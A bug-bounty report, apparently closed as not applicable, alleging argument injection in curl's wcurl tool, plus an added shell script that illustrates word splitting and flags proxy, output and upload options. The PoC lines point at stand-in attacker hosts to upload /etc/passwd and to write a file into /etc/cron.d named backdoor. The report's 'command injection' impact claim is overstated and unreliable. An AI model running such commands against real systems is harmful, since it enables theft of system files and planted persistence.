wcurl Argument Injection via Unquoted Variable

Disclosed: 2026-01-26 09:07:15 By playerofficial19 To curl
Medium
Vulnerability Details
When I was code auditing curl I stumbled upon a vulnerability in wcurl.

Affected version: current

Step 1: Open a terminal.
Step 2: Run the PoCs below.

```
wcurl --dry-run --curl-options='-x http://evil.com:8080 -o /tmp/pwned' https://example.com/test.txt
wcurl --dry-run --curl-options='-o /etc/cron.d/backdoor' https://attacker.com/malicious
wcurl --dry-run --curl-options='-x http://attacker.com:8080' https://target.com/sensitive
wcurl --dry-run --curl-options='-T /etc/passwd' https://attacker.com/steal https://x.com
```

Screenshots below.

If this is not a vulnerability, I am sorry. The dry run is used to not harm the system.

## Impact

Command injection
Report Stats
  • Report ID: 3523953
  • State: Closed
  • Substate: not-applicable
  • Upvotes: 33
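
The bug class named in the report title, shown in isolation as an added example (not code from the report and not wcurl's source; the function names and the sample value are constructed): an unquoted expansion turns one option string into several argv entries, a quoted one keeps it as a single entry, and a small review helper lists which of the resulting words are the proxy, output and upload options that the PoCs above rely on.

```shell
#!/bin/sh
# Added illustration; hypothetical helper names, not wcurl's code.

# Print one argv entry per line, exactly as a command would receive them.
show_argv() {
    for arg in "$@"; do
        printf '%s\n' "$arg"
    done
}

# Unquoted expansion: the shell word-splits the value on IFS.
split_unquoted() {
    opts=$1
    set -f          # turn globbing off so only word splitting is shown
    # shellcheck disable=SC2086
    show_argv $opts
    set +f
}

# Quoted expansion: the whole value stays a single argv entry.
keep_quoted() {
    opts=$1
    show_argv "$opts"
}

# Review helper: report the words in an option string that change where
# traffic goes or which local files are written or read.
flag_sensitive() {
    split_unquoted "$1" | while IFS= read -r word; do
        case $word in
            -x|--proxy)       printf 'proxy:%s\n' "$word" ;;
            -o|--output)      printf 'write:%s\n' "$word" ;;
            -T|--upload-file) printf 'upload:%s\n' "$word" ;;
        esac
    done
}

sample='-x http://proxy.example:8080 -o /tmp/out'   # constructed sample value
split_unquoted "$sample"    # four lines: four argv entries
keep_quoted "$sample"       # one line: one argv entry
flag_sensitive "$sample"    # the two flagged options
```

Nothing here invokes curl; the functions only print how the shell would pass the words on.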